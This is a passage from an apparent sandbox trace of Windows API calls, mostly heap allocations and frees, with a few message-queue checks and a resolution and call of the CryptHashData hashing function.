(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0189.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d58 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0189.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0189.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0189.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0189.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0189.882] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0189.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0189.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0189.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d48 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0189.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0189.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0189.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e58 [0189.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0189.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0189.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0189.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0189.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.883] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0189.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0189.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0189.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0189.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0189.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.883] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0189.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0189.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0189.883] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0189.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0189.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0189.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0189.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0189.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0189.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0189.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0189.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0189.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0189.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0189.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0189.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0189.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0189.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0189.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0189.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0189.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.885] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0189.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0189.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50aa0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0189.886] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0189.887] CryptHashData (hHash=0xa87510, pbData=0x2e54d58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0189.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0189.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0189.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0189.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0189.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0189.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0189.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0189.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0189.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0189.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0189.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0189.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0189.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0189.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0189.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0189.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 